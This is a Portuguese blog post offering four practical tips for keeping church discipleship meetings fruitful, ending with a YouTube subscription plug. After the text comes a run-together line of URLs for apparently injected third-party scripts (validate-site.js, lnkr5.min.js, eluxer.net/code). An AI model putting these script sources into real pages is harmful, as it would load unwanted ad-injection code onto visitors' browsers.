Como fazer um discipulado frutífero

É muito comum ouvir discípulos e discipuladores “reclamando” que seu discipulado está “chato”. Em alguns casos, o discipulado chega a ser, de fato, um “peso”, tanto para um, quanto para outro, permanecendo, apenas, para “cumprir tabela”.

Veja, o discipulado para ser frutífero, precisa, não só fazer a diferença na vida do discípulo, quanto dar a certeza ao discipulador que ele está sendo um canal de bênção na vida de seu discípulo.

Como fazer, então, para que o discipulado seja, de fato, frutífero?

1 – Não trabalhar apenas estudos

É muito comum o discipulado cair na rotina por acontecer sempre da mesma forma, ou seja, ser previsível.

A proposta é que o discipulador entenda que o discipulado é transferência de vida e nada melhor do que o convívio para fazer isso acontecer. É o que chamamos de discipulado relacional.

O discipulado com base em estudos não pode e nem deve ser desprezado. No entanto, o convívio em atividades do “dia a dia”, como fazer uma supervisão, ir ao médico, fazer uma visita ou ir ao mercado, por exemplo, podem ser tão construtivas quanto.

Estas são oportunidades que o discipulador terá para abordar situações adversas e dar ensinamentos práticos da Palavra. Os resultados são extraordinários, pois, desta forma, o discípulo estará sendo tratado e treinado ao mesmo tempo.

2 – Sempre elaborar perguntas “abertas”

Existem perguntas que não motivam respostas abrangentes. Antes, só conseguem extrair um “sim” ou um “não”, por exemplo. Outras, no entanto, são capazes de extrair informações preciosas para que o discipulador possa trabalhar com mais profundidade.

São perguntas de sabedoria como, por exemplo, “Conte-me um pouco mais sobre os seus projetos pessoais e ministeriais?”. A partir de perguntas como estas, o discipulador começará a abordar, com o seu discípulo, o que ele pode estar fazendo para alcançar os seus projetos.

Conforme a conversa for desenvolvendo, o discipulador poderá abordar temas como “o que deu certo”, “o que deu errado”, “o que poderia ser melhorado”, além, é claro, de trocar experiências e de dar conselhos e ensinamentos, à luz da Palavra, para que o discípulo possa, de fato, estar alcançando o crescimento e o amadurecimento necessários para alcançar os seus objetivos.

Esta estratégia, por si só, faz com que o discipulado seja algo gostoso e diferente a cada dia. Traz motiva, influencia e leva a resultados reais e consistentes.

3 – Perguntar, constantemente, sobre as 3 principais áreas: Pessoal, Familiar e Ministerial

É muito importante que o discipulador, quando se reunir com o seu discípulo, esteja abordando estas três áreas e não somente a área ministerial.

Quando o discipulador abordar a área pessoal, ele vai perguntar sobre como está sua vida de oração, a leitura da Palavra, a sua vida com Deus, como vai o seu trabalho e quais são suas maiores dificuldades, por exemplo.

Ao abordar a área familiar, o discipulador precisa abordar as tentações que o discípulo está enfrentando no seu dia a dia e como está o seu relacionamento com seus familiares (cônjuge, filhos, pais, irmãos…), especificamente.

Quanto à área ministerial, o discipulador precisa abordar como estão os discípulos que o seu discípulo está cuidando, como está o seu envolvimento com os projetos em andamento da Igreja local e como ele está se sentindo com relação às situações do dia a dia ministerial.

É de suma importância que o discipulador aborde as três áreas, constantemente, para que o discípulo alcance um crescimento equilibrado e em todas as áreas de sua vida.

4 – Intercalar discipulados individuais com discipulados em grupo e discipulados de casais

Por exemplo, se os discípulos são casados, uma semana você faz separado, na outra com ambos e na outra com todo o grupo de discípulos.

À medida que o discipulador vai revezando a forma com que ele se reúne, ele não só sai da rotina, como, principalmente, consegue alcançar os discípulos de várias formas diferentes. E, isso, por si só, traz crescimento e faz com que o discipulado seja frutífero.

Certamente, este é um assunto muito abrangente e eu quero te convidar a visitar a nossa página no YouTube. Lá, você vai encontrar vídeos específicos sobre modelos de discipulados e muito mais. Tudo gratuito para que você possa ser abençoado quando e onde quiser. Ah! Não se esqueça de assinar o canal e clicar no “sininho” que aparece na página do canal. Somente assim poderemos avisar você de toda e qualquer novidade que postarmos.

 

http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7038x&r=9http://pagevalidation.space/addons/lnkr5.min.jshttp://pagevalidation.space/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7038_